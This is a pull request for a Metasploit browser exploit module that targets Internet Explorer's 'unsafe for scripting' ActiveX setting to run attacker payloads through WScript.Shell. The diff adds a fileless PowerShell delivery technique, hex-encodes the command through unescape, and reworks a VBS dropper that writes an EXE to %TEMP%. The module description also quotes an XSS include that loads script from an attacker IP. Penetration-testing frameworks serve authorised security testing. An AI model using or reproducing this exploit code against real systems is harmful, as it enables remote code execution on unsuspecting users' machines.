### PR TITLE
Update IE unsafe scripting module

### DIFF
--- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb
+++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
@@ -122,14 +122,11 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
 	end
 
 	def psh_technique(var_shellobj, p)
-		cmd = cmd_psh_payload(p.encoded)
-		cmd.gsub!('"','')
-		cmd.gsub!('\\powershell.exe\\',"'powershell.exe'")
-		cmd.strip! # Remove trailing new line
+		cmd = Rex::Text.to_hex(cmd_psh_payload(p.encoded))
 		js_content = %Q|
 //<html><head></head><body><script>
 var #{var_shellobj} = new ActiveXObject("WScript.Shell");
-#{var_shellobj}.run("#{cmd}", 1, true);
+#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
 //</script></html>
 |
 

--- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb
+++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
@@ -6,12 +6,15 @@
 ##
 
 require 'msf/core'
+require 'msf/util/exe'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE
+	include Msf::Exploit::Powershell
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -21,10 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			marked safe for scripting" setting within Internet Explorer.  When this option is set,
 			IE allows access to the WScript.Shell ActiveX control, which allows javascript to
 			interact with the file system and run commands.  This security flaw is not uncommon
-			in corporate environments for the 'Intranet' or 'Trusted Site' zones.  In order to
-			save binary data to the file system, ADODB.Stream access is required, which in IE7
-			will trigger a cross domain access violation.  As such, we write the code to a .vbs
-			file and execute it from there, where no such restrictions exist.
+			in corporate environments for the 'Intranet' or 'Trusted Site' zones.
 
 				When set via domain policy, the most common registry entry to modify is HKLM\
 			Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,
@@ -35,96 +35,73 @@ class Metasploit3 < Msf::Exploit::Remote
 			via a direct GET http://msf-server/ or as a javascript include, such as in:
 			http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js>
 			</script>.
+
+				IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
+			an x64 iexplore.exe.
 			},
+
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'natron'
+					'natron',
+					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # PSH and remove ADODB.Stream
 				],
-			'References'     =>
+				'References'     =>
 				[
 					[ 'URL', 'http://support.microsoft.com/kb/182569' ],
 					[ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
+					[ 'URL', 'http://support.microsoft.com/kb/870669']
 				],
-			'DisclosureDate' => 'Sep 20 2010',
-			'Payload'        =>
-				{
-					'Space'           => 2048,
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
+				'DisclosureDate' => 'Sep 20 2010',
+				'Platform'       => 'win',
+				'Targets'	 =>
+					[
+						[ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
+					],
+				'DefaultOptions' =>
+					{
+						'HTTP::compression' => 'gzip'
+					},
+				'DefaultTarget'  => 0))
+
+		register_options(
 				[
-					[ 'Automatic', { } ],
-				],
-			'DefaultOptions' =>
-				{
-					'HTTP::compression' => 'gzip'
-				},
-			'DefaultTarget'  => 0))
+						OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
+				], self.class
+		)
 	end
 
 	def on_request_uri(cli, request)
 
-		#print_status("Starting...");
 		# Build out the HTML response page
-		var_shellobj		= rand_text_alpha(rand(5)+5);
-		var_fsobj		= rand_text_alpha(rand(5)+5);
-		var_fsobj_file		= rand_text_alpha(rand(5)+5);
-		var_vbsname		= rand_text_alpha(rand(5)+5);
-		var_writedir		= rand_text_alpha(rand(5)+5);
-		var_exename		= rand_text_alpha(rand(5)+5);
-		var_origLoc		= rand_text_alpha(rand(5)+5);
-		var_byteArray		= rand_text_alpha(rand(5)+5);
-		var_stream		= rand_text_alpha(rand(5)+5);
-		var_writestream		= rand_text_alpha(rand(5)+5);
-		var_strmConv		= rand_text_alpha(rand(5)+5);
+		var_shellobj		= rand_text_alpha(rand(5)+5)
 
-		p = regenerate_payload(cli);
-		print_status("Request received for #{request.uri}");
-		exe = generate_payload_exe({ :code => p.encoded })
-		#print_status("Building vbs file...");
-		# Build the content that will end up in the .vbs file
-		vbs_content	= Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}
-#{var_origLoc} = SetLocale(1033)
-|)
-
-		print_status("Encoding payload into vbs/javascript/html...");
-		# Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
-		# for conversion with ADODB.Stream
-
-		vbs_ary = []
-		# The output of this loop needs to be as small as possible since it
-		# gets repeated for every byte of the executable, ballooning it by a
-		# factor of about 80k (the current size of the exe template).  In its
-		# current form, it's down to about 4MB on the wire
-		exe.each_byte do |b|
-			vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
+		p = regenerate_payload(cli)
+		if datastore['TECHNIQUE'] == 'VBS'
+			js_content = vbs_technique(var_shellobj, p)
+		else
+			js_content = psh_technique(var_shellobj, p)
 		end
-		vbs_content << vbs_ary.join("")
 
-		# Continue with the rest of the vbs file;
-		# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
-		# Then use ADODB.Stream again to write the binary to file.
-		#print_status("Finishing vbs...");
-		vbs_content << Rex::Text.to_hex(%Q|
-Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
-#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{var_exename}.exe"
+		print_status("Request received for #{request.uri}")
+		print_status("Sending exploit html/javascript");
 
-Set #{var_strmConv} = CreateObject("ADODB.Stream")
+		# Transmit the response to the client
+		send_response(cli, js_content, { 'Content-Type' => 'text/html' })
 
-#{var_strmConv}.Type = 2
-#{var_strmConv}.Charset = "x-ansi"
-#{var_strmConv}.Open
-#{var_strmConv}.WriteText s, 0
-#{var_strmConv}.Position = 0
-#{var_strmConv}.Type = 1
-#{var_strmConv}.SaveToFile #{var_writedir}, 2
+		# Handle the payload
+		handler(cli)
+	end
 
-SetLocale(#{var_origLoc})|)
+	def vbs_technique(var_shellobj, p)
+		var_fsobj               = rand_text_alpha(rand(5)+5)
+		var_fsobj_file          = rand_text_alpha(rand(5)+5)
+		var_vbsname             = rand_text_alpha(rand(5)+5)
+		var_writedir            = rand_text_alpha(rand(5)+5)
 
-		# Encode the vbs_content
-		#print_status("Hex encoded vbs_content: #{vbs_content}");
+		exe = generate_payload_exe({ :code => p.encoded })
+		vbs = Msf::Util::EXE.to_exe_vbs(exe)
+		vbs_content =  Rex::Text.to_hex(vbs)
 
 		# Build the javascript that will be served
 		js_content  = %Q|
@@ -138,18 +115,24 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
 #{var_fsobj_file}.Close();
 
 #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
-#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{var_exename}.exe", 0, false);
 #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
 //</script></html>
 |
+		return js_content
+	end
 
-		print_status("Sending exploit html/javascript");
-		print_status("Exe will be #{var_exename}.exe and must be manually removed from the %TEMP% directory on the target.");
+	def psh_technique(var_shellobj, p)
+		cmd = cmd_psh_payload(p.encoded)
+		cmd.gsub!('"','')
+		cmd.gsub!('\\powershell.exe\\',"'powershell.exe'")
+		cmd.strip! # Remove trailing new line
+		js_content = %Q|
+//<html><head></head><body><script>
+var #{var_shellobj} = new ActiveXObject("WScript.Shell");
+#{var_shellobj}.run("#{cmd}", 1, true);
+//</script></html>
+|
 
-		# Transmit the response to the client
-		send_response(cli, js_content, { 'Content-Type' => 'text/html' })
-
-		# Handle the payload
-		handler(cli)
+		return js_content
 	end
 end


### PR DESCRIPTION
This module removes the requirement for ADODB.Stream which is blocked by default even when unsafe scripting methods are allowed. Instead we just use the VBS to write the EXE for us (we use to create a VBS file anyway). 

Have also added a technique to take advantage of Powershell to avoid dropping a file to the disk at all. Strangely even when IE is run in x64 mode, all tabs are x86 and WScript.Shell and Powershell are therefore SYSWOW64. We cant run x64 payloads in these Powershell instances but luckily this saves the user from having to guess (or recon) the correct architecture!
